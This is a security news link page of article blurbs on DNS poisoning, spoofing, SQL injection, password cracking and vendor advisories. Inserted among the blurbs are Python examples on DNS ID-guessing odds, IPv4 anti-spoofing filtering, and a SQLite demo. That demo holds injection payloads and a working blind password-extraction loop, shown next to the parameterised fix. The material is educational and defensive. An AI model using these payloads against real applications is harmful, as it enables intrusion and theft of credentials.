network security news, articles, tools, links...

| DNS Cache Poisoning, The Next Generation |

The old problem of DNS cache poisoning has again reared its ugly head. While some would argue that the domain name system protocol is inherently vulnerable to this style of attack due to the weakness of 16-bit transaction IDs, we cannot ignore the immediate threat while waiting for something better to come along. There are new attacks which make DNS cache poisoning trivial to execute against a large number of nameservers running today. The purpose of this article is to shed light on these new attacks and recommend ways to defend against them.
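Added example, not from the linked article (which is listed again further down as "DNS Spoofing"): a back-of-the-envelope model of what a 16-bit transaction ID buys the attacker. It assumes the resolver's in-flight IDs are uniformly random and distinct (weaker generators of the period only help the attacker), computes the chance that a blind burst of forged replies beats the real answer, checks that figure by simulation, and shows how the odds change when roughly 16 more bits of UDP source-port randomisation are added, the standard mitigation, which the blurb itself does not spell out. Nothing here speaks to a real nameserver; it is arithmetic about the ID space.

```python
import math
import random

TXID_SPACE = 1 << 16        # 16-bit DNS transaction ID with a fixed source port
TXID_PORT_SPACE = 1 << 32   # assumption: ~16 more bits from a randomised UDP source port


def forged_reply_success(forged: int, outstanding: int, key_space: int = TXID_SPACE) -> float:
    """Probability that at least one of `forged` distinct forged replies matches one of
    `outstanding` in-flight queries for the same name, IDs drawn uniformly without
    replacement. P(miss) = prod_{i<forged} (N - n - i) / (N - i), summed in log space."""
    if forged <= 0 or outstanding <= 0:
        return 0.0
    if forged + outstanding > key_space:
        return 1.0  # pigeonhole: some forged ID must collide
    n, N = outstanding, key_space
    ln_miss = sum(math.log1p(-n / (N - i)) for i in range(forged))
    return -math.expm1(ln_miss)  # 1 - exp(ln_miss), accurate for tiny probabilities


def simulate_race(forged: int, outstanding: int, key_space: int = TXID_SPACE,
                  trials: int = 1000, seed: int = 1) -> float:
    """Monte Carlo check: the resolver has `outstanding` queries in flight with distinct
    random IDs; the attacker blindly fires `forged` distinct guesses before the real
    answer lands. A trial counts as a poisoning if any guess matches an in-flight ID."""
    rng = random.Random(seed)
    wins = 0
    for _ in range(trials):
        in_flight = set(rng.sample(range(key_space), outstanding))
        wins += any(g in in_flight for g in rng.sample(range(key_space), forged))
    return wins / trials


def forged_replies_needed(target: float, outstanding: int = 1,
                          key_space: int = TXID_SPACE) -> int:
    """Smallest forged-reply burst that reaches `target` success probability
    (binary search; intended for the 16-bit space, where each probe is cheap)."""
    lo, hi = 1, key_space
    while lo < hi:
        mid = (lo + hi) // 2
        if forged_reply_success(mid, outstanding, key_space) >= target:
            hi = mid
        else:
            lo = mid + 1
    return lo


if __name__ == "__main__":
    for n in (1, 10, 100):
        print(f"{n:>3} outstanding queries, 1000 forged replies: "
              f"16-bit ID {forged_reply_success(1000, n):.3f}, "
              f"ID+port {forged_reply_success(1000, n, TXID_PORT_SPACE):.2e}")
    print("forged replies for a 90% chance against one outstanding query:",
          forged_replies_needed(0.9))
```

With a single outstanding query the attacker needs on the order of tens of thousands of forged packets for good odds; once a resolver can be coaxed into holding many queries for the same name in flight, a thousand packets already win most of the time, which is what makes the 16-bit ID alone inadequate.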
(...Read more)

| Kernel Hacking HOWTO |

Kernel hacking may not be hard, but it certainly could not be described as easy. That said, probably the biggest barrier to be overcome is a psychological one: having the confidence to get started, dive in and try things out. The next barrier to be faced is the lack of up-to-date, organised documentation, which hampers the efforts of even the most determined. Although there is actually quite a lot of information out there in books, web pages, newsgroups, mailing lists and the source code, it is all very disparate, disorganised and on occasion even contradictory.
(...Read more)

| THC: IPv6 Attack Toolkit |

A complete tool set to attack the inherent protocol weaknesses of IPv6 and ICMPv6, including an easy-to-use packet factory library.
IPV6 project. This code was inspired when I got into touch with IPv6, learned more and more about it and then found no tools to play (read: "hack") around with. First I tried to implement things with libnet, but then found out that the ipv6 implementation is only partial - and sucks. I tried to add the missing code, but well, it was not so easy, hence I saved my time and quickly wrote my own library.
(...Read more)
| Ten attacks you can easily avoid with Group Policy |

Let's play pretend.
Pretend you've got a malicious insider on your network with a bone to pick. We'll call him Eddie. Perhaps Eddie is a consultant or even a salesperson. He might even come in during off hours to work his "security" shift. Regardless of what he does, he knows it is pretty simple to connect to someone's network and do just about anything he wants. Why? Default Windows settings, that's why.
Eddie doesn't know about the wonders of Group Policy Object (GPO) in Windows 2000 and later.
(...Read more)
| Stop Buffer Overflow Attacks against Unpatched Vulnerabilities |

Buffer overflows, the favorite target of malicious hackers and seemingly the biggest bug in off-the-shelf software, are a serious problem for security managers. Until recently, all that users of 32-bit Windows systems could do was ensure each of their applications, including the OS, had all released security patches applied and then hope for the best. With the releases of Windows XP SP2 and Windows Server 2003 SP1 that all changed.
(...Read more)

| Honeypots, How to seek them out |

Honeypots are used to study the methods and attacks of hackers. The idea is to place one or more special servers in a network. An attacker who cannot differentiate between genuine servers/services and honeypots will sooner or later, in his search for a security hole, take up the services offered by a honeypot. All of his activities on the honeypot are logged.
(...Read more)

| Two attacks against VoIP |

VoIP is here to stay. In fact, many incumbent telecommunication carriers have been offering VoIP service for some time and several new VoIP service providers have emerged. Aside from issues such as quality of service, the aspect of security, or lack thereof, is misunderstood by some of the VoIP service providers.
The purpose of this article is to discuss two of the most well-known attacks that can be carried out in current VoIP deployments. The first attack demonstrates the ability to hijack a user's VoIP subscription and subsequent communications.
(...Read more)
| More malicious malware mauls Microsoft IE |

Hackers have released new, more efficient malware that exploits an unpatched vulnerability in Internet Explorer.
Hackers have posted a new version of malicious software that will make it easier for them to exploit an unpatched vulnerability in Microsoft Corp.'s Internet Explorer (IE) browser. Based on a critical bug disclosed on March 22, the software was posted by hackers Friday to the Milw0rm.com web site.
(...Read more)
| Account Lockout Best Practices |

Password and account lockout settings are designed to protect accounts and data in your organization by mitigating the threat of brute force guessing of account passwords. Settings in the Account Lockout and Password Policy nodes of the Default Domain policy settings enable account lockout and control how account lockout operates.
(...Read more)

| Wireless Cracking Tools |

By familiarizing yourself with following software, you will not only have a better understanding of the vulnerabilities inherent in 802.11 networks, but you will also get a glimpse at how a hacker might exploit them. These tools can even be used when auditing your own network as we will see later.
Most serious hackers and network auditors use the open source operating system Linux as the platform from which they launch attacks and perform analysis.
(...Read more)
| A Symantec Solution for Modern Day Attack Protection |

Stopping modern attacks requires a modern approach to threat management. There is a growing mismatch between the level of protection your security measures are providing and the level needed to adequately protect your network. This white paper offers threat management solutions that are part of a multi-tier suite of multifunction security products. This solution delivers maximum protection for your company by enabling pervasive coverage of your organization's IT environment with an optimal blend of reactive, proactive, and even predictive countermeasures.
(...Read more)

| WiFi vulnerability assessment checklist |

Vulnerability assessments can help you find and fix WLAN weaknesses before attackers take advantage of them. But where do you start? What should you look for? Have you covered all the bases? This checklist will help to answer these questions.
1. Discover nearby wireless devices
You can't assess your WLAN's vulnerabilities if you don't know what's out there. Start by searching for wireless devices in and around your office, creating a foundation for subsequent steps.
(...Read more)
| Inside Botnets |

In the news recently was an interesting story about MetaFisher (also known as Spy-Agent), a Trojan horse program that steals personal financial information. What was particularly interesting about the news report that I received from iDefense was screenshots of the control interface used by the MetaFisher bot network (botnet) operators. The images give a good idea of what goes on behind the scenes of botnets. If you've already looked at the news story that I posted on our Web site and didn't see the images, be sure to check it again, I added the images on Monday. You can link to the story from the MetaFisher news story below.
(...Read more)

| Using the Metasploit Framework to Disprove Computer Security |

In the computer security ecosystem, the exploit is king. There is a certain mystique about the lines of code that can vanquish a system and entice it into doing one's bidding. These same lines of code embody the power that the exploit writer wields in the electronic world: the power to influence and control the code execution path of a program that someone else wrote to serve some entirely different purpose.
(...Read more)

| Open source security testing methodology |

Truth is made of numbers. Following this golden rule, Federico Biancuzzi interviewed Pete Herzog, founder of ISECOM and creator of the OSSTMM, to talk about the upcoming revision 3.0 of the Open Source Security Testing Methodology Manual. He discusses why we need a testing methodology, why use open source, the value of certifications, and plans for a new vulnerability scanner developed with a different approach than Nessus.
(...Read more)

| Compiling exploit code: a network security must |

There are times when network security defenders need to compile exploit code. It is not unusual for more than a dozen new exploits against Windows and Linux machines to be released each day, and unfortunately, you can't always trust the exploit author or security write-ups.
First, many exploits don't work as advertised. They either don't work at all, only work some of the time, or only work in a much smaller subset of machines than originally advertised. The more exploit code that you test, the more you'll see the truth of that statement.
(...Read more)
| Exploit Published for Critical Internet Explorer Vulnerability |

Microsoft and security authorities are warning of a critical, unpatched script vulnerability in Internet Explorer 6 that can allow a hacker to take complete control of a Windows PC.
Experts have noted that, while the flaw is serious, those wishing to exploit it would have to entice users to click a link that takes them to a specially crafted Web site. In addition, for a PC to be affected, it must be running in administrator mode.
(...Read more)
| Introduction to Nessus |

Nessus is a great tool designed to automate the testing and discovery of known security problems. Typically someone, a hacker group, a security company, or a researcher discovers a specific way to violate the security of a software product. The discovery may be accidental or through directed research; the vulnerability, in various levels of detail, is then released to the security community. Nessus is designed to help identify and solve these known problems, before a hacker takes advantage of them.
(...Read more)

| SQL Injection Walkthrough |

When a machine has only port 80 open, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patches his server, you have to turn to web hacking. SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy. It attacks the web application (ASP, JSP, PHP, CGI, etc.) itself rather than the web server or the services running on the OS.
(...Read more)

| Preventing DDoS Attacks |

In this article I am trying to explain what DDoS is and how it can be prevented. DDoS happens due to a lack of security awareness on the part of network/server owners. On a daily basis we hear that a particular machine is under DDoS attack or that the NOC has unplugged a machine because of a DDoS attack, so DDoS has become one of the common issues in this electronic world. DDoS is like a disease for which no antiviral has been developed, so we should be careful when dealing with it and never take it lightly. In this article I am trying to explain the steps and measures that will help us defend against DDoS attacks, up to a certain extent.
(...Read more)

| Poor authentication increases risk of identity fraud |

The latest survey from the DTI into the IT security of UK businesses has revealed that firms could be making themselves more vulnerable by using software-based two factor authentication rather than hardware tokens. Software tokens, where a small file is placed on a user's computer, have been adopted by many firms as a relatively cheap way of increasing security. Telecoms and technology companies are the highest adopters.
(...Read more)

| The Feasibility of P2P Techniques Used in IM Worms |

Because of the almost immediate two way nature of communication, many users feel that the use of instant messaging in the workplace leads to more effective and efficient workplace communications and, therefore, to higher productivity. As a result, IM is increasing in popularity in both professional and personal applications. However, as with most things Internet based, the increasing use of instant messaging has led to an associated increase in the number of security risks.
(...Read more)

| Security hole found in crypto program GPG |

Developers of the open source GnuPG encryption software have reported a security flaw that could allow an attacker to sneak malicious code into a signed e-mail message. GnuPG, or GNU Privacy Guard, is an open source version of the PGP encryption program used for encrypting data and creating digital signatures.
(...Read more)

| Microsoft to issue one critical patch Tuesday |

In its monthly patch release next Tuesday, Microsoft Corp. will issue one critical security bulletin concerning the Office suite and one bulletin on Windows that is rated important, the company said Thursday.
Also Tuesday, Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool, according to an advisory.
(...Read more)
| Why spoofing is the number one security problem on the Internet, and how we should fight it |

This article explains the widely underestimated security impact of the current lack of anti-spoofing measures on the Internet.
The Internet Protocol (IP) basically works with small portions of data called datagrams that contain a small header that is used for address information. This header contains two addresses:
* The destination address.
* The source address.
The first address determines where the datagram should go. The second address tells the destination where the datagram originated. In the handling of this second address there lies a problem.
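Added example, not from the linked article: a small Python model of the point made above. It builds IPv4 headers carrying whatever source address the sender chooses (constructed packets, not captures), parses and checksums them as a receiver would, and then applies the source-address checks an edge router can make: drop bogon sources, drop packets that arrive from outside yet claim an inside source, and drop outbound packets whose source is not one of our own prefixes (the ingress/egress filtering usually referred to as BCP 38). The prefixes, addresses and interface labels are assumptions for the demo.

```python
import ipaddress
import struct
from dataclasses import dataclass
from typing import Iterable, Tuple

IPV4_FMT = "!BBHHHBBH4s4s"  # fixed 20-byte IPv4 header, no options

# Source addresses that should never appear on a packet arriving from the Internet.
# RFC 1918 space is deliberately not listed: a site may use it internally.
BOGON_SOURCES = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "240.0.0.0/4")]


@dataclass
class IPv4Header:
    ttl: int
    protocol: int
    src: ipaddress.IPv4Address
    dst: ipaddress.IPv4Address
    checksum_ok: bool


def _checksum(data: bytes) -> int:
    """RFC 791 one's-complement sum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4_header(src: str, dst: str, protocol: int, payload_len: int = 0,
                      ttl: int = 64) -> bytes:
    """Constructed header for the demo. Note that nothing stops the sender from
    putting any address at all in the source field: that is the whole problem."""
    fields = [0x45, 0, 20 + payload_len, 0x1234, 0x4000, ttl, protocol, 0,
              ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed]
    fields[7] = _checksum(struct.pack(IPV4_FMT, *fields))
    return struct.pack(IPV4_FMT, *fields)


def parse_ipv4_header(packet: bytes) -> IPv4Header:
    """Receiver-side view: decode the header and verify its checksum."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, _total, _ident, _ff, ttl, proto, _csum, src, dst = struct.unpack(
        IPV4_FMT, packet[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or len(packet) < ihl:
        raise ValueError("bad IHL")
    # A header whose checksum field is correct sums (with folding) to 0xFFFF,
    # so the complement of that sum is zero.
    ok = _checksum(packet[:ihl]) == 0
    return IPv4Header(ttl, proto, ipaddress.IPv4Address(src), ipaddress.IPv4Address(dst), ok)


class AntiSpoofFilter:
    """Source-address sanity checks at a site border. `inside` lists the prefixes
    legitimately used behind the border (an assumption for the demo)."""

    def __init__(self, inside: Iterable[str]):
        self.inside = [ipaddress.ip_network(p) for p in inside]

    def _is_inside(self, addr: ipaddress.IPv4Address) -> bool:
        return any(addr in net for net in self.inside)

    def verdict(self, hdr: IPv4Header, arrived_on: str) -> Tuple[bool, str]:
        """arrived_on is 'outside' (Internet-facing) or 'inside' (from our own hosts)."""
        if not hdr.checksum_ok:
            return False, "bad header checksum"
        if any(hdr.src in net for net in BOGON_SOURCES):
            return False, f"bogon source {hdr.src}"
        if arrived_on == "outside" and self._is_inside(hdr.src):
            return False, f"source {hdr.src} claims to be inside but arrived from outside"
        if arrived_on == "inside" and not self._is_inside(hdr.src):
            return False, f"source {hdr.src} is not one of our prefixes (egress filter)"
        return True, "accept"


if __name__ == "__main__":
    border = AntiSpoofFilter(["198.51.100.0/24"])
    for src, iface in (("198.51.100.7", "outside"), ("203.0.113.5", "outside"),
                       ("10.0.0.1", "inside"), ("198.51.100.7", "inside")):
        hdr = parse_ipv4_header(build_ipv4_header(src, "198.51.100.20", 6))
        print(src, iface, "->", border.verdict(hdr, iface))
```

The inside/outside asymmetry is the point: a border device cannot know whether a random Internet source is genuine, but it can know that its own prefixes never legitimately arrive from outside, and that nothing but its own prefixes should ever leave. The second rule is what protects everyone else, which is why the article treats spoofing as a shared problem rather than a local one.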
(...Read more)
| DNS Spoofing |

The old problem of DNS cache poisoning has again reared its ugly head. While some would argue that the domain name system protocol is inherently vulnerable to this style of attack due to the weakness of 16-bit transaction IDs, we cannot ignore the immediate threat while waiting for something better to come along. There are new attacks which make DNS cache poisoning trivial to execute against a large number of nameservers running today. The purpose of this article is to shed light on these new attacks and recommend ways to defend against them.
(...Read more)

| DNS Cache Snooping |

This research paper presents a technical overview of the technique known as DNS cache snooping. Firstly, a brief introduction to DNS is made, followed by a discussion of common misconceptions regarding DNS subsystems. Then this relatively unknown technique is introduced, followed by a field study to assess the overall exposure of the Internet to this threat. Also, a set of devised abuse scenarios that rely on cache snooping is presented. This paper concludes with recommendations on how to reduce exposure to this security vulnerability, including proposed changes to the BIND DNS server implementation.
(...Read more)
| New IE exploit targets older unpatched builds |

FrSIRT is reporting a brand new IE exploit targeted at XP SP0 (Gold) that appears to be patched in XP SP1 or higher, as well as W/2000 SP4. Still, there might be some folks running "Gold" (and especially W/2000 SP3 in the corporate world) ... More can be found at FrSIRT's site
Microsoft Internet Explorer "IsComponentInstalled()" Remote Stack Overflow Exploit
(...Read more)
| Writing Behind a Buffer |

In this paper we are going to describe a kind of vulnerability that is known in the literature but also poorly documented. In fact, the problem that is going to be analyzed can be reduced to a memory-adjacent overwriting attack, but usually it is obtained by exploiting the last null byte of a buffer; hence we are going to show that the same result is still possible by writing behind a buffer, under certain conditions. To fully understand the subject of this article it is necessary to describe the memory organization of running processes, then the memory-adjacent overwrite attack, concluding with our analysis.
(...Read more)

| DOS bug in Cisco Aironet |

Cisco has reported a vulnerability in Cisco Aironet Wireless Access Points (AP) that work with Cisco IOS. The company has also announced that the update that fixes this vulnerability is now available.
A remote user, who has successfully associated with a Cisco IOS Wireless Access Point, could send specially-crafted and spoofed ARP messages to the management interface on the Access Point until physical memory has been completely exhausted. As a result, the target device would not be able to handle more network traffic and it would have to be manually shut down and restarted to start working again.
(...Read more)
| Sam 0wn3d How to crack SAM File and own Windows |

Instead of storing passwords in clear text, Windows generates and stores user account passwords using two different password representations, known as "hashes." The SAM file can be found in the folder c:\Windows\system32\config. However, it cannot be accessed because the operating system locks the file. In this article I will discuss various methods that can be used to crack the SAM and own the server.
(...Read more)

| Introduction: IP Spoofing |

An article on "Security Problems in the TCP/IP Protocol Suite" by S.M.Bellovin in 1989 initially explored IP Spoofing attacks . He described how Robert Morris, creator of the now infamous Internet Worm, figured out how TCP created sequence numbers and forged a TCP packet sequence.
This TCP packet included the destination address of his victim, and using an IP spoofing attack Morris was able to obtain root access to his targeted system without a user ID or password.
(...Read more)
| Ain't no network strong enough |

The cloak-and-dagger capers of computer no-goodniks may seem like prime page-turning material, but most books on the subject have all the sex appeal of a VCR manual. The typical tome on digital security is a dreary assemblage of techno-jargon, geared toward the small clique that gets its hardcore jollies from Perl programming. Most laymen are asleep by Page 10, or at least yearning for their dog-eared copy of "Hannibal."
(...Read more)

| Protecting Your Network Against Spoofed IP Packets |

These days, the vast majority of administrators go to great lengths to protect the files on their network. Typically, elaborate firewalls are used to keep outsiders away from file servers. The files residing on those servers often lie behind an intricate permissions scheme and are often encrypted. Complex auditing mechanisms might even monitor access to files. The point is that in this day and age, most administrators take security very seriously.
(...Read more)

| SQL Injection Attacks by Example |

A customer asked that we check out his intranet site, which was used by the company's employees and customers. This was part of a larger security review, and though we'd not actually used SQL injection to penetrate a network before, we were pretty familiar with the general concepts. We were completely successful in this engagement, and wanted to recount the steps taken as an illustration.
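Added example, not from this article or the "SQL Injection Walkthrough" listed above: a constructed SQLite-backed login that shows the string-built query both pieces attack, the parameterised version that closes it, and the boolean-inference loop that pulls another user's password out one character at a time through nothing but the login form, the sort of port-80-only access the walkthrough describes. The table, usernames and passwords are made up for the demo.

```python
import sqlite3
import string
from typing import Dict, List


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample data; not from either article."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonderland")])
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """The pattern under attack: user input is pasted into the SQL text, so a quote
    or a comment marker typed into the form becomes SQL syntax."""
    sql = (f"SELECT username FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return [row[0] for row in conn.execute(sql)]


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Same query with bound parameters: the input is data and can never be syntax."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def _oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean oracle over the vulnerable endpoint: the login returns rows exactly
    when the injected `condition` is true; the trailing -- comments out the rest."""
    payload = f"' OR ({condition}) --"
    return bool(vulnerable_login(conn, payload, "x"))


def extract_password(conn: sqlite3.Connection, target: str, max_len: int = 64,
                     charset: str = string.ascii_letters + string.digits) -> str:
    """Blind extraction: first the length, then each character by position.
    Characters outside `charset` are reported as '?'."""
    length = next(
        (n for n in range(1, max_len + 1)
         if _oracle(conn, f"(SELECT length(password) FROM users "
                          f"WHERE username='{target}')={n}")),
        0)
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if _oracle(conn, f"(SELECT substr(password,{pos},1) FROM users "
                             f"WHERE username='{target}')='{ch}'"):
                recovered += ch
                break
        else:
            recovered += "?"
    return recovered


def demo() -> Dict[str, object]:
    """Run the classic payloads against both endpoints and return the results."""
    conn = make_demo_db()
    return {
        "comment_bypass": vulnerable_login(conn, "admin'--", "wrong"),
        "tautology": sorted(vulnerable_login(conn, "nobody", "' OR '1'='1")),
        "safe_comment_bypass": safe_login(conn, "admin'--", "wrong"),
        "safe_tautology": safe_login(conn, "nobody", "' OR '1'='1"),
        "safe_valid": safe_login(conn, "alice", "wonderland"),
        "blind_extract": extract_password(conn, "admin"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:<20} {result!r}")
```

Note that the tautology goes into the password field on purpose: placed in the username field, `' OR '1'='1` would bind as `username='' OR ('1'='1' AND password='x')` and return nothing, a precedence detail that trips up many first attempts at the walkthrough.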
(...Read more)

| Cisco Warns Of Vulnerability In VPN Device |

Cisco Systems on Friday released a security advisory about its VPN 3000 Series concentrators, which have a vulnerability that could allow a malicious user to send a crafted HTTP packet that could result in a denial-of-service attack.
(...Read more)

| WMF Vulnerability Sparks Patch Program |

The Windows Metafile (WMF) vulnerability, which emerged in the last week of 2005 and was resolved with a patch that Microsoft released off its regular patch schedule at the end of the first week of 2006, wasn't good news at all. But I managed to wring a good outcome out of the situation, since it allowed me to give some structure to our patch management process.
(...Read more)

| Hackers Find Security Hole In BlackBerry Enterprise Server |

Research In Motion's BlackBerry Enterprise Server product may be vulnerable to denial-of-service attacks, according to a group of German hackers, called Phenoelit, that identifies security flaws.
Phenoelit found a problem in the way the server's BlackBerry Router handles Server Routing Protocol packets. An attacker could cause denial of service by sending "specially crafted" packets to the router, according to a vulnerability note posted on the U.S. Computer Emergency Readiness Team's Web site. The result could be disrupted communications between the BlackBerry Enterprise Server and BlackBerry devices, the note states.
(...Read more)
| Kerberos 5 Vulnerabilities |

MIT Kerberos 5 Multiple Arbitrary Code Execution Vulnerabilities: Two distinct but similar vulnerabilities in the Kerberos Key Distribution Center (KDC) could allow a remote attacker to execute code of their choice on the victim server, possibly resulting in total compromise of the Kerberos environment.
Vulnerabilities in a critical piece of security infrastructure such as a KDC should be addressed immediately, if for no other reason than to ensure continued confidence in such a critical piece of infrastructure. Neither of these vulnerabilities appears to have exploit code produced, but given the high value of compromise, it's unlikely that this will continue for very long.
(...Read more)
| Threat landscape and lapses justify security paranoia |

Security remained foremost on the minds of IT leadership in 2005, and with good reason. The year saw a Microsoft research project discover the first so-called zero-day exploit; "identity theft," "phishing," and "spyware" became part of the popular lexicon; and the need grew for companies to treat any computer joining the network as hostile until proved secure. It's no wonder IT people at all levels sound paranoid.
(...Read more)

| Wireless Vulnerability Database Launches |

Three organizations have teamed up to create a standard database of wireless threats: Every industry now seems to have its own threats database, and there are good reasons to standardize on names, behavior, and vendor responses. CERT started over 17 years ago to help assess Internet vulnerabilities; with years of wireless attacks in the wild, the Wireless Vulnerabilities and Exploits (WVE) site is overdue.
Network Chemistry, a wireless network security firm, is one of three sponsors, along with training and certification firm CWNP and the Center for Advanced Defense Studies. The editorial board includes highly credible members. The site perhaps soft-launched earlier, but the formal press release went out today.
(...Read more)
Categories
Web Security
Basic Security
Network Tools
Archived Articles
Wireless Security
Networking Basics
Disaster Recovery
Enterprise Security
Intrusion Detection
More Archived Articles
Exploits & Vulnerabilities
Viruses & other Malware